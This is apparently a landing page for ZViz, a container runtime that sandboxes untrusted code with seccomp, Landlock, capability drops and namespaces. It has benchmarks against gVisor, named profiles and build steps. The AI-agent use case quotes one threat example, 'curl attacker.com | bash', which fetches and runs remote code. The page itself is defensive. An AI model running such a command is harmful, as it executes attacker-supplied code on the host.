Container isolation for code you can't trust but have to run.
ZViz is an OCI-compatible Zig container runtime that takes a selective denial approach.
132 syscalls reach the host kernel at native speed. 24 dangerous ones are blocked at the seccomp
layer before any kernel code runs. One — socket — is argument-filtered inline.
No userspace kernel. No daemon.
$ zviz run hostile-tenant ~/bundle --verbose [init] namespaces ............. user pid mount ipc uts [init] capabilities ........... 41 dropped [init] landlock ............... ruleset applied [init] seccomp ................ 124-instr BPF loaded [init] cgroups v2 ............. mem=512M pids=64 [ready] PID 1 in 7.8ms [syscall] read(0, ...) ALLOW [syscall] write(1, ...) ALLOW [syscall] clock_gettime(...) ALLOW [syscall] socket(AF_PACKET, ...) DENY EPERM [syscall] ptrace(...) DENY EPERM [syscall] mount(...) DENY EPERM [syscall] init_module(...) DENY EPERM [broker] socket(AF_INET, SOCK_STREAM, 0) inspected ok
Output shape based on README's --verbose behavior; not a recorded session.
You're running code you didn't write.
Containers built on namespaces and cgroups leave the full kernel attack surface exposed. Every runc escape CVE is a reminder that "containerized" isn't a security strategy.
AI agents executing LLM-generated code
One prompt injection from curl attacker.com | bash. Selective denial means the exploit fails at step 1.
CI pipelines on opaque dep trees
npm install on 47 transitive deps you have not audited. Drop caps, deny network, keep the build.
Third-party plugins that "need shell access"
Landlock restricts filesystem access. Capabilities cleared. The plugin lives in PID 1 of a fresh userns.
Multi-tenant workloads next to each other
Fresh user + pid + mount + ipc + uts namespace per container. The kernel boundary is the actual boundary.
Five enforcement layers, applied in order.
Ordering is load-bearing. Capabilities drop before seccomp loads. Landlock applies before seccomp so its own setup syscalls aren't self-blocked.
Namespaces
user, pid, mount, ipc, uts — resource isolation
Capabilities
all 41 Linux capabilities dropped — no CAP_SYS_*
Landlock LSM
unprivileged filesystem access control
Seccomp-BPF
124-instruction filter — ALLOW / DENY / BROKER
cgroups v2
memory, PID, CPU limits — fork bombs contained
App → Kernel (all syscalls available). Namespaces + cgroups only.
App → Sentry userspace kernel (emulates ~300 syscalls) → Host kernel (~70).
App → BPF filter → ALLOW (132, native) / DENY (24) / BROKER (mediated).
The performance tax goes away when you stop emulating.
Allowed syscalls hit the host kernel directly. gVisor routes everything through its Sentry process. The clock_gettime gap is extreme because Sentry can't use the kernel vDSO.
Numbers from the ZViz repo's demo.sh --perf with the same OCI bundle and statically-linked benchmark.
| Syscall | ZViz | gVisor | Speedup |
|---|---|---|---|
clock_gettime | 20 ns | 4,982 ns | 249x |
read | 212 ns | 4,393 ns | 20.7x |
write | 211 ns | 1,169 ns | 5.5x |
getuid | 202 ns | 1,125 ns | 5.6x |
getpid | 297 ns | 1,209 ns | 4.1x |
open_close | 2,895 ns | 4,403 ns | 1.5x |
stat | 1,767 ns | 2,364 ns | 1.3x |
Pick a profile, not a policy file.
Five named profiles cover the common shapes. Choose the closest, then narrow further if you need to.
CI / build systems
Default profile. Balanced security for general-purpose CI workloads.
HTTP APIs, services
Network allowed. Socket ops optimised for high-throughput request paths.
Data processing, ETL
No network. Memory cap 8G. For pipelines that should not phone home.
Untrusted user code
Maximum restrictions. The right starting point for agent execution.
Debugging only
Allows ptrace. NOT for production. Useful for tracing why your prod profile is blocking something.
When you should use gVisor instead.
ZViz blocks dangerous syscalls outright. gVisor emulates them in a sandboxed userspace kernel. Both achieve isolation. The approach matters for compatibility.
| If your workload needs… | Use | Why |
|---|---|---|
ptrace (strace, debuggers) | gVisor | ZViz blocks it. gVisor emulates safely. |
mount / unshare (Docker-in-Docker) | gVisor | Nested containers need namespace syscalls. |
| Bazel / Nix builds | gVisor | Internal sandboxing creates namespaces. |
| Maximum syscall throughput | ZViz | Native speed vs 5–250x emulation overhead. |
| Sub-10ms cold starts | ZViz | ~8ms vs ~200ms. |
| Strictest policy (block, don't emulate) | ZViz | Exploit code fails immediately. |
Simple rule: nested containers or process tracing → gVisor. Otherwise ZViz is faster and stricter.
Build it, point it at an OCI bundle.
Linux 5.13+ for Landlock. cgroups v2. Zig 0.15.0+ to build from source. Any OCI rootfs works — including ones produced by docker export.
On Ubuntu 24.04+ install the bundled AppArmor profile so pivot_root survives apparmor_restrict_unprivileged_userns=1. Without it, ZViz falls back to chdir-only filesystem isolation.
$ git clone https://github.com/Skelf-Research/zviz.git $ cd zviz && zig build -Doptimize=ReleaseSafe # Ubuntu 24.04+: load the AppArmor profile $ sudo install -m 0644 packaging/apparmor/zviz /etc/apparmor.d/zviz $ sudo apparmor_parser -r /etc/apparmor.d/zviz # Grab any image as an OCI rootfs $ mkdir -p ~/zviz-bundle/rootfs $ docker create --name extract redis:alpine $ docker export extract | tar -C ~/zviz-bundle/rootfs -xf - $ docker rm extract # Write a minimal config.json, then: $ ./zig-out/bin/zviz run my-container ~/zviz-bundle [ready] PID 1 in 7.8ms
ZViz auto-mounts /proc (nosuid+nodev+noexec), /sys (read-only), and a private /dev tmpfs. You don't need mounts[] entries for those.
ZViz vs gVisor
Selective denial vs userspace-kernel emulation. Fair rows, grounded numbers, an honest list of what each one allows that the other blocks.
ZViz vs runc (plain Docker)
runc gives you namespaces + cgroups. ZViz adds Landlock, capability drop, seccomp filtering, and a much smaller exposed syscall surface.